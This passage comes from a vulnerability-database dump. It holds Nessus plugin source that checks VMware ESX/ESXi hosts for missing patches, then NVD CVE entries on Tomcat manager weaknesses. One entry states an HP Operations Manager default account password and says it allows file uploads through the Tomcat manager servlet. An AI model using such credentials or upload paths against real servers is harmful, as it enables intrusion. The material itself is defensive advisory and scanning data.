JRE 1.6.0_19: CVE-2009-3555, CVE-2010-0082,\n CVE-2010-0084, CVE-2010-0085, CVE-2010-0087, CVE-2010-0088,\n CVE-2010-0089, CVE-2010-0090, CVE-2010-0091, CVE-2010-0092,\n CVE-2010-0093, CVE-2010-0094, CVE-2010-0095, CVE-2010-0837,\n CVE-2010-0838, CVE-2010-0839, CVE-2010-0840, CVE-2010-0841,\n CVE-2010-0842, CVE-2010-0843, CVE-2010-0844, CVE-2010-0845,\n CVE-2010-0846, CVE-2010-0847, CVE-2010-0848, CVE-2010-0849,\n CVE-2010-0850.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the following name to the security issue fixed in\n Oracle (Sun) JRE 1.6.0_20: CVE-2010-0886.\n\nd. vCenter Update Manager Oracle (Sun) JRE is updated to version\n 1.5.0_26\n\n Oracle (Sun) JRE update to version 1.5.0_26, which addresses\n multiple security issues that existed in earlier releases of\n Oracle (Sun) JRE.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the following names to the security issues fixed in\n Oracle (Sun) JRE 1.5.0_26: CVE-2010-3556, CVE-2010-3566,\n CVE-2010-3567, CVE-2010-3550, CVE-2010-3561, CVE-2010-3573,\n CVE-2010-3565,CVE-2010-3568, CVE-2010-3569, CVE-2009-3555,\n CVE-2010-1321, CVE-2010-3548, CVE-2010-3551, CVE-2010-3562,\n CVE-2010-3571, CVE-2010-3554, CVE-2010-3559, CVE-2010-3572,\n CVE-2010-3553, CVE-2010-3549, CVE-2010-3557, CVE-2010-3541,\n CVE-2010-3574.\n\ne. vCenter Server and ESX Apache Tomcat updated to version 6.0.28\n\n Apache Tomcat updated to version 6.0.28, which addresses multiple\n security issues that existed in earlier releases of Apache Tomcat\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the following names to the security issues fixed in\n Apache Tomcat 6.0.24: CVE-2009-2693, CVE-2009-2901, CVE-2009-2902,i\n and CVE-2009-3548.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the following names to the security issues fixed in\n Apache Tomcat 6.0.28: CVE-2010-2227, CVE-2010-1157.\n\nf. vCenter Server third-party component OpenSSL updated to version\n 0.9.8n\n\n The version of the OpenSSL library in vCenter Server is updated to\n 0.9.8n.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-0740 and CVE-2010-0433 to the\n issues addressed in this version of OpenSSL.\n\ng. ESX third-party component OpenSSL updated to version 0.9.8p\n\n The version of the ESX OpenSSL library is updated to 0.9.8p.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-3864 and CVE-2010-2939 to the\n issues addressed in this update.\n\nh. ESXi third-party component cURL updated\n\n The version of cURL library in ESXi is updated.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the name CVE-2010-0734 to the issues addressed in\n this update.\n\ni. ESX third-party component pam_krb5 updated\n\n The version of pam_krb5 library is updated.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2008-3825 and CVE-2009-1384 to the\n issues addressed in the update.\n\nj. ESX third-party update for Service Console kernel\n\n The Service Console kernel is updated to include kernel version\n 2.6.18-194.11.1.\n\n The Common Vulnerabilities and Exposures project (cve.mitre.org)\n has assigned the names CVE-2010-1084, CVE-2010-2066, CVE-2010-2070,\n CVE-2010-2226, CVE-2010-2248, CVE-2010-2521, CVE-2010-2524,\n CVE-2010-0008, CVE-2010-0415, CVE-2010-0437, CVE-2009-4308,\n CVE-2010-0003, CVE-2010-0007, CVE-2010-0307, CVE-2010-1086,\n CVE-2010-0410, CVE-2010-0730, CVE-2010-1085, CVE-2010-0291,\n CVE-2010-0622, CVE-2010-1087, CVE-2010-1173, CVE-2010-1437,\n CVE-2010-1088, CVE-2010-1187, CVE-2010-1436, CVE-2010-1641, and\n CVE-2010-3081 to the issues addressed in the update.\n\n Notes :\n - The update also addresses the 64-bit compatibility mode\n stack pointer underflow issue identified by CVE-2010-3081. This\n issue was patched in an ESX 4.1 patch prior to the release of\n ESX 4.1 Update 1 and in a previous ESX 4.0 patch release.\n - The update also addresses CVE-2010-2240 for ESX 4.0.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2011/000140.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the missing patches.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Web Start Plugin Command Line Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(20, 22, 119, 189, 200, 255, 264, 287, 310, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/02/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi:4.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"VMware ESX Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/VMware/release\", \"Host/VMware/version\");\n script_require_ports(\"Host/VMware/esxupdate\", \"Host/VMware/esxcli_software_vibs\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"vmware_esx_packages.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/VMware/release\")) audit(AUDIT_OS_NOT, \"VMware ESX / ESXi\");\nif (\n !get_kb_item(\"Host/VMware/esxcli_software_vibs\") &&\n !get_kb_item(\"Host/VMware/esxupdate\")\n) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ninit_esx_check(date:\"2011-02-10\");\nflag = 0;\n\n\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-201103401-SG\",\n patch_updates : make_list(\"ESX400-201104401-SG\", \"ESX400-201110401-SG\", \"ESX400-201111201-SG\", \"ESX400-201203401-SG\", \"ESX400-201205401-SG\", \"ESX400-201206401-SG\", \"ESX400-201209401-SG\", \"ESX400-201302401-SG\", \"ESX400-201305401-SG\", \"ESX400-201310401-SG\", \"ESX400-201404401-SG\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\nif (\n esx_check(\n ver : \"ESX 4.0\",\n patch : \"ESX400-201103403-SG\",\n patch_updates : make_list(\"ESX400-201111201-SG\", \"ESX400-201203401-SG\", \"ESX400-201205401-SG\", \"ESX400-201206401-SG\", \"ESX400-201209401-SG\", \"ESX400-201302401-SG\", \"ESX400-201305401-SG\", \"ESX400-201310401-SG\", \"ESX400-201404401-SG\", \"ESX400-Update03\", \"ESX400-Update04\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESX 4.1\",\n patch : \"ESX410-201101201-SG\",\n patch_updates : make_list(\"ESX40-TO-ESX41UPDATE01\", \"ESX410-201104401-SG\", \"ESX410-201110201-SG\", \"ESX410-201201401-SG\", \"ESX410-201204401-SG\", \"ESX410-201205401-SG\", \"ESX410-201206401-SG\", \"ESX410-201208101-SG\", \"ESX410-201211401-SG\", \"ESX410-201301401-SG\", \"ESX410-201304401-SG\", \"ESX410-201307401-SG\", \"ESX410-201312401-SG\", \"ESX410-201404401-SG\", \"ESX410-Update01\", \"ESX410-Update02\", \"ESX410-Update03\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESXi 4.0\",\n patch : \"ESXi400-201103401-SG\",\n patch_updates : make_list(\"ESXi400-201104401-SG\", \"ESXi400-201110401-SG\", \"ESXi400-201203401-SG\", \"ESXi400-201205401-SG\", \"ESXi400-201206401-SG\", \"ESXi400-201209401-SG\", \"ESXi400-201302401-SG\", \"ESXi400-201305401-SG\", \"ESXi400-201310401-SG\", \"ESXi400-201404401-SG\", \"ESXi400-Update03\", \"ESXi400-Update04\")\n )\n) flag++;\n\nif (\n esx_check(\n ver : \"ESXi 4.1\",\n patch : \"ESXi410-201101201-SG\",\n patch_updates : make_list(\"ESXi410-201104401-SG\", \"ESXi410-201110201-SG\", \"ESXi410-201201401-SG\", \"ESXi410-201204401-SG\", \"ESXi410-201205401-SG\", \"ESXi410-201206401-SG\", \"ESXi410-201208101-SG\", \"ESXi410-201211401-SG\", \"ESXi410-201301401-SG\", \"ESXi410-201304401-SG\", \"ESXi410-201307401-SG\", \"ESXi410-201312401-SG\", \"ESXi410-201404401-SG\", \"ESXi410-Update01\", \"ESXi410-Update02\", \"ESXi410-Update03\")\n )\n) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:esx_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-30T17:31:15", "description": "The remote VMware ESX / ESXi host is missing a security-related patch.\nIt is, therefore, affected by multiple vulnerabilities, including remote code execution vulnerabilities, in several third-party components and libraries :\n\n - Apache Tomcat \n - Apache Tomcat Manager\n - cURL \n - Java Runtime Environment (JRE)\n - Kernel \n - Microsoft SQL Express\n - OpenSSL\n - pam_krb5", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "VMware ESX / ESXi Third-Party Libraries Multiple Vulnerabilities (VMSA-2011-0003) (remote check)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2008-0085", "CVE-2008-0086", "CVE-2008-0106", "CVE-2008-0107", "CVE-2008-3825", "CVE-2008-5416", "CVE-2009-1384", "CVE-2009-2693", "CVE-2009-2901", "CVE-2009-2902", "CVE-2009-3548", "CVE-2009-3555", "CVE-2009-4308", "CVE-2010-0003", "CVE-2010-0007", "CVE-2010-0008", "CVE-2010-0082", "CVE-2010-0084", "CVE-2010-0085", "CVE-2010-0087", "CVE-2010-0088", "CVE-2010-0089", "CVE-2010-0090", "CVE-2010-0091", "CVE-2010-0092", "CVE-2010-0093", "CVE-2010-0094", "CVE-2010-0095", "CVE-2010-0291", "CVE-2010-0307", "CVE-2010-0410", "CVE-2010-0415", "CVE-2010-0433", "CVE-2010-0437", "CVE-2010-0622", "CVE-2010-0730", "CVE-2010-0734", "CVE-2010-0740", "CVE-2010-0837", "CVE-2010-0838", "CVE-2010-0839", "CVE-2010-0840", "CVE-2010-0841", "CVE-2010-0842", "CVE-2010-0843", "CVE-2010-0844", "CVE-2010-0845", "CVE-2010-0846", "CVE-2010-0847", "CVE-2010-0848", "CVE-2010-0849", "CVE-2010-0850", "CVE-2010-0886", "CVE-2010-1084", "CVE-2010-1085", "CVE-2010-1086", "CVE-2010-1087", "CVE-2010-1088", "CVE-2010-1157", "CVE-2010-1173", "CVE-2010-1187", "CVE-2010-1321", "CVE-2010-1436", "CVE-2010-1437", "CVE-2010-1641", "CVE-2010-2066", "CVE-2010-2070", "CVE-2010-2226", "CVE-2010-2227", "CVE-2010-2240", "CVE-2010-2248", "CVE-2010-2521", "CVE-2010-2524", "CVE-2010-2928", "CVE-2010-2939", "CVE-2010-3081", "CVE-2010-3541", "CVE-2010-3548", "CVE-2010-3549", "CVE-2010-3550", "CVE-2010-3551", "CVE-2010-3553", "CVE-2010-3554", "CVE-2010-3556", "CVE-2010-3557", "CVE-2010-3559", "CVE-2010-3561", "CVE-2010-3562", "CVE-2010-3565", "CVE-2010-3566", "CVE-2010-3567", "CVE-2010-3568", "CVE-2010-3569", "CVE-2010-3571", "CVE-2010-3572", "CVE-2010-3573", "CVE-2010-3574", "CVE-2010-3864"], "modified": "2022-05-25T00:00:00", "cpe": ["cpe:/o:vmware:esx", "cpe:/o:vmware:esxi"], "id": "VMWARE_VMSA-2011-0003_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/89674", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89674);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/25\");\n\n script_cve_id(\n \"CVE-2008-0085\",\n \"CVE-2008-0086\",\n \"CVE-2008-0106\",\n \"CVE-2008-0107\",\n \"CVE-2008-3825\",\n \"CVE-2008-5416\",\n \"CVE-2009-1384\",\n \"CVE-2009-2693\",\n \"CVE-2009-2901\",\n \"CVE-2009-2902\",\n \"CVE-2009-3548\",\n \"CVE-2009-3555\",\n \"CVE-2009-4308\",\n \"CVE-2010-0003\",\n \"CVE-2010-0007\",\n \"CVE-2010-0008\",\n \"CVE-2010-0082\",\n \"CVE-2010-0084\",\n \"CVE-2010-0085\",\n \"CVE-2010-0087\",\n \"CVE-2010-0088\",\n \"CVE-2010-0089\",\n \"CVE-2010-0090\",\n \"CVE-2010-0091\",\n \"CVE-2010-0092\",\n \"CVE-2010-0093\",\n \"CVE-2010-0094\",\n \"CVE-2010-0095\",\n \"CVE-2010-0291\",\n \"CVE-2010-0307\",\n \"CVE-2010-0410\",\n \"CVE-2010-0415\",\n \"CVE-2010-0433\",\n \"CVE-2010-0437\",\n \"CVE-2010-0622\",\n \"CVE-2010-0730\",\n \"CVE-2010-0734\",\n \"CVE-2010-0740\",\n \"CVE-2010-0837\",\n \"CVE-2010-0838\",\n \"CVE-2010-0839\",\n \"CVE-2010-0840\",\n \"CVE-2010-0841\",\n \"CVE-2010-0842\",\n \"CVE-2010-0843\",\n \"CVE-2010-0844\",\n \"CVE-2010-0845\",\n \"CVE-2010-0846\",\n \"CVE-2010-0847\",\n \"CVE-2010-0848\",\n \"CVE-2010-0849\",\n \"CVE-2010-0850\",\n \"CVE-2010-0886\",\n \"CVE-2010-1084\",\n \"CVE-2010-1085\",\n \"CVE-2010-1086\",\n \"CVE-2010-1087\",\n \"CVE-2010-1088\",\n \"CVE-2010-1157\",\n \"CVE-2010-1173\",\n \"CVE-2010-1187\",\n \"CVE-2010-1321\",\n \"CVE-2010-1436\",\n \"CVE-2010-1437\",\n \"CVE-2010-1641\",\n \"CVE-2010-2066\",\n \"CVE-2010-2070\",\n \"CVE-2010-2226\",\n \"CVE-2010-2227\",\n \"CVE-2010-2240\",\n \"CVE-2010-2248\",\n \"CVE-2010-2521\",\n \"CVE-2010-2524\",\n \"CVE-2010-2928\",\n \"CVE-2010-2939\",\n \"CVE-2010-3081\",\n \"CVE-2010-3541\",\n \"CVE-2010-3548\",\n \"CVE-2010-3549\",\n \"CVE-2010-3550\",\n \"CVE-2010-3551\",\n \"CVE-2010-3553\",\n \"CVE-2010-3554\",\n \"CVE-2010-3556\",\n \"CVE-2010-3557\",\n \"CVE-2010-3559\",\n \"CVE-2010-3561\",\n \"CVE-2010-3562\",\n \"CVE-2010-3565\",\n \"CVE-2010-3566\",\n \"CVE-2010-3567\",\n \"CVE-2010-3568\",\n \"CVE-2010-3569\",\n \"CVE-2010-3571\",\n \"CVE-2010-3572\",\n \"CVE-2010-3573\",\n \"CVE-2010-3574\",\n \"CVE-2010-3864\"\n );\n script_bugtraq_id(\n 30082,\n 30083,\n 30118,\n 30119,\n 31534,\n 32710,\n 35112,\n 36935,\n 36954,\n 37724,\n 37762,\n 37906,\n 37942,\n 37944,\n 37945,\n 38027,\n 38058,\n 38144,\n 38162,\n 38165,\n 38185,\n 38348,\n 38479,\n 38533,\n 38857,\n 38898,\n 39013,\n 39044,\n 39062,\n 39067,\n 39068,\n 39069,\n 39070,\n 39071,\n 39072,\n 39073,\n 39075,\n 39077,\n 39078,\n 39081,\n 39082,\n 39083,\n 39084,\n 39085,\n 39086,\n 39088,\n 39089,\n 39090,\n 39091,\n 39093,\n 39094,\n 39095,\n 39096,\n 39120,\n 39492,\n 39569,\n 39635,\n 39715,\n 39719,\n 39794,\n 39979,\n 40235,\n 40356,\n 40776,\n 40920,\n 41466,\n 41544,\n 41904,\n 42242,\n 42249,\n 42306,\n 43239,\n 43965,\n 43971,\n 43979,\n 43985,\n 43988,\n 43992,\n 43994,\n 44009,\n 44011,\n 44012,\n 44013,\n 44014,\n 44016,\n 44017,\n 44026,\n 44027,\n 44028,\n 44030,\n 44032,\n 44035,\n 44040,\n 44884\n );\n script_xref(name:\"VMSA\", value:\"2011-0003\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/15\");\n\n script_name(english:\"VMware ESX / ESXi Third-Party Libraries Multiple Vulnerabilities (VMSA-2011-0003) (remote check)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESX / ESXi host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESX / ESXi host is missing a security-related patch.\nIt is, therefore, affected by multiple vulnerabilities, including\nremote code execution vulnerabilities, in several third-party\ncomponents and libraries :\n\n - Apache Tomcat \n - Apache Tomcat Manager\n - cURL \n - Java Runtime Environment (JRE)\n - Kernel \n - Microsoft SQL Express\n - OpenSSL\n - pam_krb5\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2011-0003\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2011/000140.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory that\npertains to ESX version 4.0 / 4.1 or ESXi version 4.0 / 4.1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2010-3574\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2010-3081\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Sun Java Web Start Plugin Command Line Argument Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n script_cwe_id(20, 22, 119, 189, 200, 255, 264, 287, 310, 399);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2008/07/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/02/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esxi\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Host/VMware/vsphere\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\nport = get_kb_item_or_exit(\"Host/VMware/vsphere\");\nesx = '';\n\nif (\"ESX\" >!< rel)\n audit(AUDIT_OS_NOT, \"VMware ESX/ESXi\");\n\nextract = eregmatch(pattern:\"^(ESXi?) (\\d\\.\\d).*$\", string:ver);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_APP_VER, \"VMware ESX/ESXi\");\nelse\n{\n esx = extract[1];\n ver = extract[2];\n}\n\n# fixed build numbers are the same for ESX and ESXi\nfixes = make_array(\n \"4.0\", \"360236\",\n \"4.1\", \"348481\"\n );\n\nfix = FALSE;\nfix = fixes[ver];\n\n# get the build before checking the fix for the most complete audit trail\nextract = eregmatch(pattern:'^VMware ESXi?.* build-([0-9]+)$', string:rel);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_BUILD, \"VMware \" + esx, ver);\n\nbuild = int(extract[1]);\n\n# if there is no fix in the array, fix is FALSE\nif (!fix)\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware \" + esx, ver, build);\n\nif (build < fix)\n{\n\n report = '\\n Version : ' + esx + \" \" + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fix +\n '\\n';\n security_report_v4(port:port, extra:report, severity:SECURITY_HOLE);\n exit(0);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware \" + esx, ver, build);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:42:17", "description": "The Tomcat server in IBM Rational Quality Manager and Rational Test Lab Manager has a default password for the ADMIN account, which makes it easier for remote attackers to execute arbitrary code by leveraging access to the manager role. NOTE: this might overlap CVE-2009-3548.", "cvss3": {}, "published": "2010-10-26T18:00:00", "type": "cve", "title": "CVE-2010-4094", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3548", "CVE-2010-4094"], "modified": "2011-01-11T06:45:00", "cpe": ["cpe:/a:ibm:rational_test_lab_manager:*", "cpe:/a:ibm:rational_quality_manager:*"], "id": "CVE-2010-4094", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-4094", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:ibm:rational_test_lab_manager:*:*:*:*:*:*:*:*", "cpe:2.3:a:ibm:rational_quality_manager:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:38:15", "description": "HP Operations Manager has a default password of OvW*busr1 for the ovwebusr account, which allows remote attackers to execute arbitrary code via a session that uses the manager role to conduct unrestricted file upload attacks against the /manager servlet in the Tomcat servlet container. NOTE: this might overlap CVE-2009-3099 and CVE-2009-3843.", "cvss3": {}, "published": "2009-12-03T17:30:00", "type": "cve", "title": "CVE-2009-4189", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3099", "CVE-2009-3843", "CVE-2009-4189"], "modified": "2009-12-04T05:00:00", "cpe": ["cpe:/a:hp:operations_manager:*"], "id": "CVE-2009-4189", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4189", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:operations_manager:*:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:36:25", "description": "HP Operations Manager 8.10 on Windows contains a \"hidden account\" in the XML file that specifies Tomcat users, which allows remote attackers to conduct unrestricted file upload attacks, and thereby execute arbitrary code, by using the org.apache.catalina.manager.HTMLManagerServlet class to make requests to manager/html/upload.", "cvss3": {}, "published": "2009-11-24T00:30:00", "type": "cve", "title": "CVE-2009-3843", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3843"], "modified": "2017-08-17T01:31:00", "cpe": ["cpe:/a:hp:operations_manager:8.10"], "id": "CVE-2009-3843", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3843", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:hp:operations_manager:8.10:*:windows:*:*:*:*:*"]}, {"lastseen": "2022-03-23T11:37:57", "description": "IBM Cognos Express 9.0 allows attackers to obtain unspecified access to the Tomcat Manager component, and cause a denial of service, by leveraging hardcoded credentials.", "cvss3": {}, "published": "2010-02-05T22:30:00", "type": "cve", "title": "CVE-2010-0557", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-0557"], "modified": "2010-02-08T05:00:00", "cpe": ["cpe:/a:ibm:cognos_express:9.0"], "id": "CVE-2010-0557", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2010-0557", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:ibm:cognos_express:9.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T21:35:14", "description": "The Windows installer for Apache Tomcat 6.0.0 through 6.0.20, 5.5.0 through 5.5.28, and possibly earlier versions uses a blank default password for the administrative user, which allows remote attackers to gain privileges.", "cvss3": {}, "published": "2009-11-12T23:30:00", "type": "cve", "title": "CVE-2009-3548", "cwe": ["CWE-255"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": true, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3548"], "modified": "2019-03-25T11:31:00", "cpe": ["cpe:/a:apache:tomcat:4.1.6", "cpe:/a:apache:tomcat:6.0.4", "cpe:/a:apache:tomcat:5.5.17", "cpe:/a:apache:tomcat:3.2.4", "cpe:/a:apache:tomcat:5.0.30", "cpe:/a:apache:tomcat:5.0.6", "cpe:/a:apache:tomcat:5.5.10", "cpe:/a:apache:tomcat:5.5.16", "cpe:/a:apache:tomcat:5.0.19", "cpe:/a:apache:tomcat:3.3.1a", "cpe:/a:apache:tomcat:6.0.15", "cpe:/a:apache:tomcat:4.0.6", "cpe:/a:apache:tomcat:4.1.20", "cpe:/a:apache:tomcat:4.1.14", "cpe:/a:apache:tomcat:6.0.18", 